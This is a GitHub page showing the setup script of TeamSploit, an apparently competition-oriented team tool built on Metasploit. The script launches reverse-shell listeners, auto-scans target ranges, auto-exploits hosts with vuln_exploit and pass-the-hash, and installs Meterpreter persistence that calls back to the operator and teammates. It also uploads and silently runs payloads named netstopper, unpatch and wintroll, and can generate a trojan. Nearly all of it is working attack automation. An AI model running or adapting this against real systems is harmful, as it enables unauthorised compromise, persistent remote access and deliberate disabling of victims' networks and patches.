-
Notifications
You must be signed in to change notification settings - Fork 2
/
.setup
executable file
·169 lines (149 loc) · 8.82 KB
/
.setup
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
#!/bin/bash
# TeamSploit - Pen Testing With Friends
# Copyrighted: Justin M. Wray ([email protected])
# Special Thanks: Team ICF (Twitter:@ICFRedTeam)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Oh did you manually pass stuff in? Idiot...
source teamsploit.conf
echo "set Prompt ts-listener" > .teamsploit.rc.listener
echo "set ExitOnSession false" >> .teamsploit.rc.listener
echo "use exploit/multi/handler" >> .teamsploit.rc.listener
echo "setg LHOST $TS_MY_IP" >> .teamsploit.rc.listener
echo "set LPORT $TS_TEAM_PORT" >> .teamsploit.rc.listener
echo "exploit -z -j" >> .teamsploit.rc.listener
echo "set ExitOnSession false" >> .teamsploit.rc.listener
echo "set LPORT $TS_TEAM_PORT_2" >> .teamsploit.rc.listener
echo "exploit -z -j" >> .teamsploit.rc.listener
echo "set ExitOnSession false" >> .teamsploit.rc.listener
echo "set LPORT $TS_TEAM_PORT_HTTP" >> .teamsploit.rc.listener
echo "exploit -z -j" >> .teamsploit.rc.listener
echo "set ExitOnSession false" >> .teamsploit.rc.listener
echo "set LPORT $TS_TEAM_PORT_HTTPS" >> .teamsploit.rc.listener
echo "exploit -z -j" >> .teamsploit.rc.listener
echo "clear" >> .teamsploit.rc.listener
echo "jobs -v" >> .teamsploit.rc.listener
echo "set Prompt teamsploit" > .teamsploit.rc.primary
if [ $TS_SPLOITWATCH == 1 ]; then
echo "load sploitwatch" >> .teamsploit.rc.primary
echo "set SPLOITWATCH_CMD_REPORT $TS_SPLOITWATCH_CMD_REPORT" >> .teamsploit.rc.primary
echo "set SPLOITWATCH_SRV_URI $TS_SPLOITWATCH_SRV_URI" >> .teamsploit.rc.primary
echo "set SPLOITWATCH_EVENT $TS_SPLOITWATCH_EVENT" >> .teamsploit.rc.primary
echo "set SPLOITWATCH_HANDLE $TS_SPLOITWATCH_HANDLE" >> .teamsploit.rc.primary
fi
echo "load autopost" >> .teamsploit.rc.primary
echo "load openvas" >> .teamsploit.rc.primary
echo "load nexpose" >> .teamsploit.rc.primary
echo "load nessus" >> .teamsploit.rc.primary
echo "load nessus_teamsploit" >> .teamsploit.rc.primary
echo "load auto_exploit" >> .teamsploit.rc.primary
echo "load pass_the_hash" >> .teamsploit.rc.primary
echo "set AutoLoadStdapi false" >> .teamsploit.rc.primary
# Connect to our Vuln Scanner(s)
if [ $TS_NESSUS_CONNECT == 1 ]; then
echo "nessus_connect $TS_NESSUS_USER:$TS_NESSUS_PASS@$TS_NESSUS_HOST:$TS_NESSUS_PORT ok" >> .teamsploit.rc.primary
echo "nessus_teamsploit_connect $TS_NESSUS_USER:$TS_NESSUS_PASS@$TS_NESSUS_HOST:$TS_NESSUS_PORT ok" >> .teamsploit.rc.primary
fi
if [ $TS_NEXPOSE_CONNECT == 1 ]; then
echo "nexpose_connect $TS_NEXPOSE_USER:$TS_NEXPOSE_PASS@$TS_NEXPOSE_HOST:$TS_NEXPOSE_PORT ok" >> .teamsploit.rc.primary
fi
if [ $TS_OPENVAS_CONNECT == 1 ]; then
echo "openvas_connect $TS_OPENVAS_USER:$TS_OPENVAS_PASS@$TS_OPENVAS_HOST:$TS_OPENVAS_PORT ok" >> .teamsploit.rc.primary
fi
# We can haz shared DB?
if [ $TS_LOCAL == 0 ]; then
echo "db_connect $TS_DB_USER:$TS_DB_PASS@$TS_DB_HOST:$TS_DB_PORT/$TS_DB_NAME" >> .teamsploit.rc.primary
fi
# Duplicate our Primary RC for Sub Primary Shells
echo "clear" >> .teamsploit.rc.primary
echo "show plugins" >> .teamsploit.rc.primary
cp .teamsploit.rc.primary .teamsploit.rc.primary.sub
# Run Scans?
SCAN_RANGE=`echo $TS_TARGET_RANGES | sed -e 's/;/\n/g' | sed -e 's/$/.0\/24/g' | tr '\n' ',' | sed -e 's/\,$//g'`
if [ $TS_NESSUS_AUTOSCAN == 1 ]; then
echo "nessus_scan_new $TS_NESSUS_POLICY \"teamsploit - `date +%D-%T`\" $SCAN_RANGE" >> .teamsploit.rc.primary
fi
if [ $TS_NEXPOSE_AUTOSCAN == 1 ]; then
echo "nexpose_scan $SCAN_RANGE" >> .teamsploit.rc.primary
fi
if [ $TS_OPENVAS_AUTOSCAN == 1 ]; then
echo "openvas_target_create \"teamsploit\" $SCAN_RANGE \"targets\"" >> .teamsploit.rc.primary
echo "openvas_task_create \"teamsploit Scan\" \"Scan teamsploit Targets\" 0 1" >> .teamsploit.rc.primary
echo "openvas_task_start 0" >> .teamsploit.rc.primary
fi
# Are we running a MSFD/MSFRPCD Service?
if [ $TS_SERVER == 1 ]; then
echo "load msfd ServerHost=$TS_MY_IP ServerPort=$TS_SERVER_MSFD_PORT" >> .teamsploit.rc.primary
echo "load msgrpc Host=$TS_MY_IP Port=$TS_SERVER_MSFRPCD_PORT User=$TS_SERVER_MSFRPCD_USER Pass=$TS_SERVER_MSFRPCD_PASS" >> .teamsploit.rc.primary
fi
echo "clear" >> .teamsploit.rc.primary
echo "show plugins" >> .teamsploit.rc.primary
WORKSPACE_NAME=`date +teamsploit_%s`
if [ $TS_AUTO_OWN == 1 ];then
echo "workspace -a $WORKSPACE_NAME" >> .teamsploit.rc.primary
echo "workspace $WORKSPACE_NAME" >> .teamsploit.rc.primary
echo "nessus_teamsploit_scan_wait" >> .teamsploit.rc.primary
echo "nessus_teamsploit_report_get last" >> .teamsploit.rc.primary
echo "vuln_exploit -j $TS_AUTO_OWN_JOBS" >> .teamsploit.rc.primary
echo "pass_the_hash -j $TS_AUTO_OWN_JOBS" >> .teamsploit.rc.primary
echo "clear" >> .teamsploit.rc.primary
echo "sessions -l" >> .teamsploit.rc.primary
fi
rm /tmp/autopost.rb.* 2> /dev/null
# Lets setup the plugins!
echo "session.run_cmd('run persistence -S -U -X -i 30 -p $TS_TEAM_PORT -r $TS_MY_IP')" > .msf/plugins/.autopost.source.persistence
if [[ $TS_SHARE_SHELLS == 1 ]] && [[ $TS_TEAM_MATES != "" ]]; then
echo $TS_TEAM_MATES | sed -e 's/;/\n/g' | sed -e 's/^/session.run_cmd(\"run persistence -S -U -X -i 30 -p '$TS_TEAM_PORT' -r /g' -e 's/$/\")/g' | tr '"' "'" >> .msf/plugins/.autopost.source.persistence
fi
echo > .msf/plugins/.autopost.source.trojans
if [ $TS_NETSTOPPER == 1 ]; then
echo "session.run_cmd('upload ./.trojans/netstopper.cmd .')" >> .msf/plugins/.autopost.source.trojans
echo "session.run_cmd('execute -H -f netstopper.cmd')" >> .msf/plugins/.autopost.source.trojans
fi
if [ $TS_UNPATCHER == 1 ]; then
echo "session.run_cmd('upload ./.trojans/unpatch.cmd .')" >> .msf/plugins/.autopost.source.trojans
echo "session.run_cmd('execute -H -f unpatch.cmd')" >> .msf/plugins/.autopost.source.trojans
fi
if [ $TS_TROLLWARE == 1 ]; then
echo "session.run_cmd('upload ./.trojans/wintroll.cmd .')" >> .msf/plugins/.autopost.source.trojans
echo "session.run_cmd('upload ./.trojans/wallpaper.bmp .')" >> .msf/plugins/.autopost.source.trojans
echo "session.run_cmd('execute -H -f wintroll.cmd')" >> .msf/plugins/.autopost.source.trojans
fi
TS_LOOT_DIR_DEL=`echo $TS_LOOT_DIR | sed -e 's/\//||/g'`
if [ $TS_TARGET_SOLO == 0 ]; then
sed '/#!TS_AUTOPOST_AUTOTARGET!#/ r .msf/plugins/.autopost.source.autotarget' .msf/plugins/.autopost.source.general > /tmp/autopost.rb.autotarget
sed '/#!TS_AUTOPOST_GENERAL!#/ r /tmp/autopost.rb.autotarget' .msf/plugins/.autopost.source > /tmp/autopost.rb.general
else
sed '/#!TS_AUTOPOST_GENERAL!#/ r .msf/plugins/.autopost.source.general' .msf/plugins/.autopost.source > /tmp/autopost.rb.general
fi
sed '/#!TS_AUTOPOST_WINDOWS!#/ r .msf/plugins/.autopost.source.windows' /tmp/autopost.rb.general > /tmp/autopost.rb.windows
sed '/#!TS_AUTOPOST_LINUX!#/ r .msf/plugins/.autopost.source.linux' /tmp/autopost.rb.windows > /tmp/autopost.rb.linux
sed '/#!TS_AUTOPOST_OSX!#/ r .msf/plugins/.autopost.source.osx' /tmp/autopost.rb.linux > /tmp/autopost.rb.oxs
sed '/#!TS_AUTOPOST_PERSISTENCE!#/ r .msf/plugins/.autopost.source.persistence' /tmp/autopost.rb.oxs > /tmp/autopost.rb.persistence
sed '/#!TS_AUTOPOST_TROJANS!#/ r .msf/plugins/.autopost.source.trojans' /tmp/autopost.rb.persistence > /tmp/autopost.rb.trojans
sed -e 's/#!TS_AUTOPOST_GENERAL!#//g' -e 's/#!TS_AUTOPOST_WINDOWS!#//g' -e 's/#!TS_AUTOPOST_LINUX!#//g' -e 's/#!TS_AUTOPOST_OSX!#//g' -e 's/#!TS_AUTOPOST_PERSISTENCE!#//g' -e 's/#!TS_AUTOPOST_TROJANS!#//g' -e 's/#!TS_AUTOPOST_AUTOTARGET!#//g' /tmp/autopost.rb.trojans > /tmp/autopost.rb.full
sed -e 's/#!TS_LOOT_DIR!#/'$TS_LOOT_DIR_DEL'/g' -e 's/||/\//g' /tmp/autopost.rb.full > /tmp/autopost.rb.final
sed -e 's/#!TS_AUTOPOST_OUTPUT!#/'$TS_AUTOPOST_OUTPUT'/g' -e 's/#!TS_TEAM_MATES!#/'$TS_TEAM_MATES'/g' -e 's/#!TS_TEAM_PORT!#/'$TS_TEAM_PORT'/g' -e 's/#!TS_ADMIN_USER!#/'$TS_ADMIN_USER'/g' -e 's/#!TS_ADMIN_PASS!#/'$TS_ADMIN_PASS'/g' /tmp/autopost.rb.final > ./.msf/plugins/autopost.rb
cat .msf/plugins/autopost.rb | grep -vf .msf/plugins/.autopost.source.autotarget > .msf/plugins/autopost_notrg.rb
sudo cp -R ./.msf/plugins/*.rb $TS_MSF_PATH/msf3/plugins/
sudo cp -R ./.msf/scripts/meterpreter/*.rb $TS_MSF_PATH/msf3/scripts/meterpreter/
if [ $TS_SERVER == 1 ]; then
sudo msfd -a $TS_MY_IP -p $TS_SERVER_MSFD_PORT
sudo msfrpcd -a $TS_MY_IP -p $TS_SERVER_MSFRPCD_PORT -U $TS_SERVER_MSFRPCD_USER -P $TS_SERVER_MSFRPCD_PASS
sleep 10
cat .teamsploit.rc.primary.sub | sed '$aexit' | nc $TS_MY_IP $TS_SERVER_MSFD_PORT
fi
if [ $TS_TROJAN == 1 ]; then
./.gentrojan
fi